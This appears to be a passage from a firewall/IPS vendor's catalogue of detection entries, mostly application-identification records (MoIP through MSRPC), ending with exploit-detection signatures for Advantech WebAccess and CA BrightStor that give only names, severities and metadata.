Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MoIP is a company that processes online payments, allowing anyone to get through the internet for media such as credit cards, debit cards, bank transfer, direct debit and mobile.
Back to top

Mojang

About this situation: Application Mojang detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mojang is an game developer studio.
Back to top

Mojang-Minecraft-Java

About this situation: Mojang Minecraft Java client usage
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-1638-5242
Description: Minecraft is a popular mining and crafting game.
Back to top

Mojave-Networks

About this situation: Application Mojave-Networks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mojave Networks provides enterprise-grade mobile security that combines the best of both client and network technologies.
Back to top

Mojo-Helpdesk

About this situation: Application Mojo-Helpdesk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mojo Helpdesk allows organizations to centralize, assign and track user requests.
Back to top

Molotov.tv

About this situation: Molotov.tv usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1540-5242
Last changed: sgpkg-ips-1769-5242
Description: Molotov.tv is an media streaming service.
Back to top

Momentum!

About this situation: Application Momentum! detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Momentum is a trusted partner on your journey to financial wellness. Broad range of advice, insurance, investments and health offerings give you the best possible financial solution, because good financial wellness enables you to achieve your purpose in life.
Back to top

Momondo

About this situation: Momondo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-769-5211
Description: Momondo.com is a travel search engine that allows users to find and compare prices of airplane tickets, hotels and rental cars.
Back to top

monday

About this situation: Application monday detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Monday is a web and mobile solution for team management, connect people to workplace processes, for companies of all sizes, across any industry.
Back to top

Moneris

About this situation: Application Moneris detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Moneris is a provider of payment processing solutions. It offers credit, debit, wireless and online payment services for merchants in industry segment.
Back to top

Monetate

About this situation: Monetate usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-601-5211
Description: Monetate is a web advertising and statistic collection service.
Back to top

Monexa-Billing

About this situation: Application Monexa-Billing detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Monexa is in the business of helping organizations drive results and reduce complexity through smarter enterprise billing.
Back to top

MoneyBird

About this situation: Application MoneyBird detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MoneyBird is solution for creating and sending invoices via the web.
Back to top

MoneyGuidePro

About this situation: Application MoneyGuidePro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MoneyGuidePro is a client-centered Financial Planning and Retirement Planning Software for fast and easy Goal Planning, Insurance Needs Analysis, Asset Allocation, and Estate Planning.
Back to top

Mongo-HQ

About this situation: Application Mongo-HQ detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MongoHQ is a private, Database-as-a-Service (DBaaS) platform for securely hosting and managing shared and dedicated MongoDB instances.
Back to top

MongoDB

About this situation: MongoDB traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-759-5211
Description: MongoDB is a cross-platform document-oriented database system. It is classified as a "NoSQL" database. Source: Wikipedia
Back to top

MongoLab

About this situation: Application MongoLab detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MongoLab is a fully managed cloud database service featuring MongoDB databases, automated backups, web-based tools, 24
Back to top

Moniker

About this situation: Application Moniker detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Moniker provides domain registration services.
Back to top

Monitis

About this situation: Application Monitis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Monitis is an application performance management platform with a complete stack of enterprise-class monitoring software as a service (SaaS) for IT specialists.
Back to top

Monitise

About this situation: Application Monitise detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Monitise provide extensive and commercially successful mobile banking and payments service in the world.
Back to top

Monster

About this situation: Monster.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-688-5211
Last changed: sgpkg-ips-688-5211
Description: Monster is an employment website provided in multiple languages.
Back to top

MonsterCommerce

About this situation: Application MonsterCommerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MonsterCommerce provides shopping cart software, fully design customizable, packed with features and backed by 24
Back to top

Montova

About this situation: Application Montova detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Montova is a supply chain, integration and collaboration suite.
Back to top

Moodle

About this situation: Moodle usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-572-5211
Last changed: sgpkg-ips-939-5242
Description: Moodle is a free and open source learning platform for building and publishing educational course content in the internet.
Back to top

Moodstocks

About this situation: Application Moodstocks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Moodstocks lets you add supersonic image recognition to your iOS and Android mobile apps thanks to its image recognition API and SDK.
Back to top

Moon

About this situation: Application Moon detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: moon is a collaborative SaaS designed for professional services firms (Consulting, IT Services, Communication, ...), covering all core processes: . CRM. Project Management. Knowledge Management. Time Tracking. Invoicing and Cash Management. People Development. PL, Business Planning Controlling, including KPI Dashboard.
Back to top

Moonshadow

About this situation: Application Moonshadow detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Moonshadow provides online and iPhone shopping cart solutions, full product data on 10 million books, CDs and DVDs.
Back to top

Moqups

About this situation: Application Moqups detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Moqups is a convenient online wireframe and mockup builder that gives users instant access to a number of visual tools. The user can arrange each element on a traditional graph paper style canvas.
Back to top

Morgan-Stanley-Fund-Services

About this situation: Application Morgan-Stanley-Fund-Services detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Morgan Stanley Fund Services provides accounting and investor services to hedge funds.
Back to top

Morningstar

About this situation: Morningstar usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-631-5211
Description: Morningstar.com provides stock market analysis, portfolio tools, mutual funds, equity info and ETF research, etc. The application can be accessed using a browser at site: www.morningstar.com.
Back to top

Motif-Investing

About this situation: Application Motif-Investing detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Motif Investing is an broker platform that lets invest in stock and bond portfolios built around ideas and economic trends.
Back to top

Motionsoft

About this situation: Application Motionsoft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Motionsoft's leadership in SaaS member relationship management software
Back to top

MoTTY

About this situation: Endpoint Context Agent based MoTTY
Context: EI Correlation
Severity: 1
Tags: Remote Administration, Endpoint
First detected in: sgpkg-ips-1523-5242
Last changed: sgpkg-ips-1523-5242
Description: MoTTY endpoint application has been detected.
Back to top

Mountain-Commerce

About this situation: Application Mountain-Commerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mountain Commerce is a complete end-to-end solution for companies seeking to establish and maintain a Retail Presence on the Internet.
Back to top

Mouse-Breaker-Games

About this situation: Mouse Breaker Games usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Mouseflow

About this situation: Application Mouseflow detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mouseflow is a tool for performing web analytics and realtime user studies on websites.
Back to top

MouseStats

About this situation: Application MouseStats detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MouseStats is hosted web service for website designers and startups to provide website heat maps and visitor activity analysis by tracking visitors mouse moves, clicks, and scrolls to increase conversion rates and maximize ROI.
Back to top

Moxie

About this situation: Application Moxie detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Moxie is a customer experience suite that uses mobile access, live chat, and customer analytics to provide a complete ecommerce experience.
Back to top

Moxiecode-Webshop

About this situation: Application Moxiecode-Webshop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Moxiecode is software company focused on System development and integration, Product development, Strategy, analysis, Search Engine Optimization, Education.
Back to top

Moxtra-Meeting

About this situation: Moxtra Meeting usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-715-5211
Description: Moxtra is a productivity application for team communication and collaboration. It provides online collaboration and conferencing solution. The service can be accessed using a web browser at https://www.moxtra.com/service/#/login.
Back to top

Moz

About this situation: Application Moz detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Moz develops marketing software, provides robust APIs for link data and social influence.
Back to top

Mozenda

About this situation: Application Mozenda detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mozenda enables to automate the process of extracting specific text and images from any website. In minutes you can build an agent and extract data from any number of webpages.
Back to top

Mozeo

About this situation: Application Mozeo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mozeo.com helps organizations of all sizes easily communicate to their audience.
Back to top

Mozilla-Addons

About this situation: Mozilla Addon service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-771-5211
Description: Mozilla Addon service usage has been detected.
Back to top

Mozilla-Services

About this situation: Mozilla online services usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1190-5242
Description: Mozilla online services usage has been detected.
Back to top

Mozilla-Tiles

About this situation: Mozilla Tiles usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-769-5211
Description: Mozilla Tiles service delivers sponsored tiles for the Firefox new tab screen.
Back to top

Mozilla-Tracking-Protection

About this situation: Mozilla Tracking Protection usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-773-5211
Description: Mozilla-based browsers, such as Firefox, contain a tracking protection feature which blocks sites that ignore Do-Not-Track settings in the browser.
Back to top

Mozy

About this situation: Application Mozy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mozy by EMC is a solution for online, data, and computer backup software. Mozy enables you to manage multiuser environments, schedule automatic backups, and monitor the health of your backups from a web-based console.
Back to top

Mp3nova.org

About this situation: mp3nova.org usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A p2p download service that allows users to search for torrent files for various types of content such as pirated software, movies, and music.
Back to top

MpCmdRun

About this situation: Endpoint Context Agent based MpCmdRun.exe detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: A network connection launched by the Windows system process MpCmdRun.exe was detected. MpCmdRun.exe is a utility used by Windows Defender.
Back to top

MPEG file

About this situation: MPEG file detected
Context: File Stream Redirection
Severity: 2
Tags: File Type Identification, Content Identification, Media File, MPEG Video
First detected in: sgpkg-ips-487-5211
Last changed: sgpkg-ips-487-5211
Description:
Back to top

Mphasis

About this situation: Application Mphasis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mphasis consistently delivers global Infrastructure Technology Outsourcing, Applications Services Outsourcing and Business Process Outsourcing services through a combination of technology know-how, domain and process expertise. MphasiS brings to their clients a credible and experienced global leadership team driving service delivery through the next generation global delivery model.
Back to top

MQTT

About this situation: MQTT usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Description: MQTT (Message Queuing Telemetry Transport) is a lightweight publish/subscribe messaging transport protocol.
Back to top

Mrecord

About this situation: Application Mrecord detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MRecord provides medical records technology solutions for healthcare professionals to create, interact, and manage medical records.
Back to top

mRemoteNG

About this situation: Endpoint Context Agent based mRemoteNG
Context: EI Correlation
Severity: 1
Tags: Remote Administration, Endpoint
First detected in: sgpkg-ips-1523-5242
Last changed: sgpkg-ips-1523-5242
Description: mRemoteNG endpoint application has been detected.
Back to top

MRI-Network

About this situation: Application MRI-Network detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MRINetwork recruitment organization wth a full range of Permanent Placement options ranging from Retained or Contingency Search to Contract Staffing and Large-scale Project Search solutions, MRINetwork gives you the flexibility you want at the pace you demand.
Back to top

MRPEasy

About this situation: Application MRPEasy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MRPEasy is an manufacturing resource planning software in cloud and mobile
Back to top

MSCI

About this situation: Application MSCI detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MSCI is an provider of research-driven insights and tools for institutional investors.
Back to top

MSCsoftware

About this situation: Application MSCsoftware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MSCsoftware is a software company in multidiscipline simulation. It helps companies improve solutions in design and test of manufactured products. Its engineering simulation technology is used for linear and nonlinear finite element analysis
Back to top

MSDN

About this situation: Application MSDN detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Microsoft Developer Network is the portion of Microsoft responsible for managing the firm's relationship with developers and testers, such as
Back to top

MSDSonline

About this situation: Application MSDSonline detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MSDSonline is the provider of compliance solutions. It offers products and services that help companies automate and manage reporting processes to streamline environmental, health and safety regulatory compliance requirements.
Back to top

MSG

About this situation: Application MSG detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MSG is the IT consulting and systems-integration company. It offers consulting, solutions, partnership.
Back to top

MSK-Digital-ID

About this situation: Application MSK-Digital-ID detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MSK Security is designed to prevent all of the common website and consumer attack mechanisms without the need for complex or cumbersome systems. The patent pending 'Non-Linear Authentication Technology' removes the username and password entry fields from the website. This step eliminates the attacks against username and password entry fields such as: SQL Injection, Key Loggers, Phishing, Pharming and Man-in-The-Middle attacks. MSK Digital ID - for small to large enterprises looking for data protection on the Cloud.
Back to top

MSN

About this situation: MSN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Basic Internet Services, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-773-5211
Description: MSN is a Microsoft portal that offers for example news, sports, games, videos and entertainment.
Back to top

MSN Weather

About this situation: Endpoint Context Agent based MSN Weather detection
Context: EI Correlation
Severity: 1
Tags: News, Endpoint
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-986-5242
Description: MSN Weather endpoint application detected.
Back to top

MSN-Games

About this situation: msn games usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: This site provides games that can be played on the Web or downloaded to a personal computer or smartphone.
Back to top

MSN-Money

About this situation: MSN Money usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1698-5242
Description: MSN Money is online website that provide real-time financial news, tools, calculators and analysis for online investors. MSN Money provide stock, commodity and indexes quote to track and research stocks and investments. The service can be accessed at: http://www.msn.com/en-us/money.
Back to top

MSN-Video

About this situation: MSN Video usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: MSN Video usage has been detected.
Back to top

MSN2GO

About this situation: MSN2Go usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This client is a chat application that can be accessed using a browser through an internet connection.
Back to top

MSP-Integrations

About this situation: Application MSP-Integrations detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MSP Integrations provide innovative solutions for managed services providers
Back to top

mSpy

About this situation: Application mSpy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: mSpy is a safety and monitoring software for device. It provides safety monitoring children or elderly parents activity. The software is used by businesses small and large alike to enforce acceptable use policies, secure remote device.
Back to top

MSRPC

About this situation: MSRPC protocol traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-1139-5242
Description: MSRPC is an interprocess communication technique that allows client and server software to communicate.
Back to top

MSRPC-Endpoint-Mapper

About this situation: MSRPC Endpoint Mapper traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-759-5211
Description: MSRPC Endpoint Mapper is a service on a remote procedure call (RPC) server that maintains a database of dynamic endpoints and allows clients to map an interface/object UUID pari to a local dynamic endpoint. Source: msdn.microsoft.com. This Application requires engine version 5.7.4 or higher.
Back to top

MSRPC-TCP_Advantech-WebAccess-Bwpfile-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: TCP MSRPC Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1291-5242
Last changed: sgpkg-ips-1291-5242
Vulnerability: Advantech-WebAccess-Bwpfile-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_Advantech-WebAccess-Node-Webvrpcs-Uninstallwa-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: TCP MSRPC Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1163-5242
Vulnerability: Advantech-WebAccess-Node-Webvrpcs-Uninstallwa-Denial-Of-Service
Description:
Back to top

MSRPC-TCP_Advantech-WebAccess-SCADA-Bwthinfl-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: TCP MSRPC Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1617-5242
Vulnerability: Advantech-WebAccess-SCADA-Bwthinfl-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CA-BrightStor-Arcserve-Backup-Message-Engine-Insecure-Method-Exposure

About this situation: An attempt to exploit a vulnerability in CA BrightStor Enterprise Backup detected
Context: TCP MSRPC Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates Business Protection Suite, Computer Associates BrightStor Enterprise Backup, Computer Associates BrightStor ARCserve Backup, Computer Associates Business Protection Suite for Microsoft SBS, Computer Associates Server Protection Suite, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-404-4219
Vulnerability: CA-BrightStor-Arcserve-Backup-Message-Engine-Insecure-Method-Exposure
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Bwrpswd.exe-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1196-5242
Vulnerability: Advantech-WebAccess-Bwrpswd.exe-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Datacore-Service-Function-0x5228-Strcpy-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-753-5211
Last changed: sgpkg-ips-941-5242
Vulnerability: Advantech-WebAccess-Datacore-Service-Function-0x5228-Strcpy-Heap-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Datacore-Service-Function-0x523a-Strcpy-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-751-5211
Last changed: sgpkg-ips-751-5211
Vulnerability: Advantech-WebAccess-Datacore-Service-Function-0x523a-Strcpy-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-IOCTL-0x1138b-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1437-5242
Last changed: sgpkg-ips-1437-5242
Vulnerability: Advantech-WebAccess-IOCTL-0x1138b-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-IOCTL-10001-Bwflapp-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1398-5242
Last changed: sgpkg-ips-1398-5242
Vulnerability: Advantech-WebAccess-IOCTL-10001-Bwflapp-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-IOCTL-10001-Bwfrerpt-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1397-5242
Last changed: sgpkg-ips-1397-5242
Vulnerability: Advantech-WebAccess-IOCTL-10001-Bwfrerpt-Stack-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-IOCTL-10001-Bwimgexe-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Vulnerability: Advantech-WebAccess-IOCTL-10001-Bwimgexe-Stack-Based-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwdlgpup-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1194-5242
Last changed: sgpkg-ips-1194-5242
Vulnerability: Advantech-WebAccess-Scada-Bwdlgpup-Arbitrary-File-Deletion
Description:
Back to top

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwdraw-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1215-5242
Last changed: sgpkg-ips-1215-5242
Vulnerability: Advantech-WebAccess-Scada-Bwdraw-Out-Of-Bounds-Write
Description:
Back to top

